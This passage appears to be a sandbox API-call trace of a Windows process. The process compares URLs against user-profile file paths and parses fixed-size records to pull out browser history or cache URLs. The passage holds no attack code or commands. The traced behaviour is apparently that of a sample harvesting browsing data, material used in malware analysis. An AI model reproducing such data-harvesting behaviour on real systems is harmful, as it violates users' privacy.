_String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned 1 [0085.880] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned 1 [0085.880] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.880] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.880] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.880] _strlwr (in: _Str="http://go.microsoft.com/fwlink/" | out: _Str="http://go.microsoft.com/fwlink/") returned="http://go.microsoft.com/fwlink/" [0085.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://go.microsoft.com/fwlink/") returned 32 [0085.880] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.880] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.880] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.880] _strlwr (in: _Str="https://support.microsoft.com/en-us/products/internet-explorer" | out: _Str="https://support.microsoft.com/en-us/products/internet-explorer") returned="https://support.microsoft.com/en-us/products/internet-explorer" [0085.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="https://support.microsoft.com/en-us/products/internet-explorer") returned 63 [0085.880] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.880] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.881] SetFilePointer (in: hFile=0xa0, lDistanceToMove=21632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5480 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.881] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.881] _strlwr (in: _Str="http://www.iegallery.com/en/addons/" | out: _Str="http://www.iegallery.com/en/addons/") returned="http://www.iegallery.com/en/addons/" [0085.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://www.iegallery.com/en/addons/") returned 36 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.881] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.881] _strlwr (in: _Str="http://go.microsoft.com/fwlink/" | out: _Str="http://go.microsoft.com/fwlink/") returned="http://go.microsoft.com/fwlink/" [0085.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://go.microsoft.com/fwlink/") returned 32 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.881] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.881] _strlwr (in: _Str="https://www.microsoft.com/en-us/iegallery" | out: _Str="https://www.microsoft.com/en-us/iegallery") returned="https://www.microsoft.com/en-us/iegallery" [0085.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="https://www.microsoft.com/en-us/iegallery") returned 42 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.881] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.881] _strlwr (in: _Str="https://support.microsoft.com/products/internet-explorer" | out: _Str="https://support.microsoft.com/products/internet-explorer") returned="https://support.microsoft.com/products/internet-explorer" [0085.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="https://support.microsoft.com/products/internet-explorer") returned 57 [0085.881] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.882] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.882] _strlwr (in: _Str="https://support.microsoft.com/en-us/products/internet-explorer" | out: _Str="https://support.microsoft.com/en-us/products/internet-explorer") returned="https://support.microsoft.com/en-us/products/internet-explorer" [0085.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="https://support.microsoft.com/en-us/products/internet-explorer") returned 63 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.882] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.882] _strlwr (in: _Str="http://go.microsoft.com/fwlink/" | out: _Str="http://go.microsoft.com/fwlink/") returned="http://go.microsoft.com/fwlink/" [0085.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://go.microsoft.com/fwlink/") returned 32 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.882] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.882] _strlwr (in: _Str="http://go.microsoft.com/fwlink/" | out: _Str="http://go.microsoft.com/fwlink/") returned="http://go.microsoft.com/fwlink/" [0085.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://go.microsoft.com/fwlink/") returned 32 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.882] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.882] _strlwr (in: _Str="http://www.msn.com/de-de/" | out: _Str="http://www.msn.com/de-de/") returned="http://www.msn.com/de-de/" [0085.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://www.msn.com/de-de/") returned 26 [0085.882] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.882] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.882] SetFilePointer (in: hFile=0xa0, lDistanceToMove=23936, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d80 [0085.883] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.883] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=24064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e00 [0085.883] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.883] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=24192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e80 [0085.883] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.883] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=24320, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.884] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.884] SetFilePointer (in: hFile=0xa0, lDistanceToMove=24448, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f80 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.884] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.884] SetFilePointer (in: hFile=0xa0, lDistanceToMove=24576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6000 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.884] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.884] _strlwr (in: _Str="http://www.msn.com/de-de/" | out: _Str="http://www.msn.com/de-de/") returned="http://www.msn.com/de-de/" [0085.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://www.msn.com/de-de/") returned 26 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.884] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.884] _strlwr (in: _Str="https://www.google.de/" | out: _Str="https://www.google.de/") returned="https://www.google.de/" [0085.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="https://www.google.de/") returned 23 [0085.884] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.884] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.884] SetFilePointer (in: hFile=0xa0, lDistanceToMove=25344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6300 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=25472, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6380 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=25600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6400 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=25728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6480 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=25856, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6500 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=25984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6580 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26112, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6600 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6680 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6700 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.885] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26496, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6780 [0085.885] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.885] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.886] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26624, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6800 [0085.886] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.886] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.886] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26752, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6880 [0085.886] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.886] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.886] SetFilePointer (in: hFile=0xa0, lDistanceToMove=26880, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6900 [0085.886] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.886] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.886] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27008, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6980 [0085.886] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.886] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.886] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27136, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6a00 [0085.886] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, 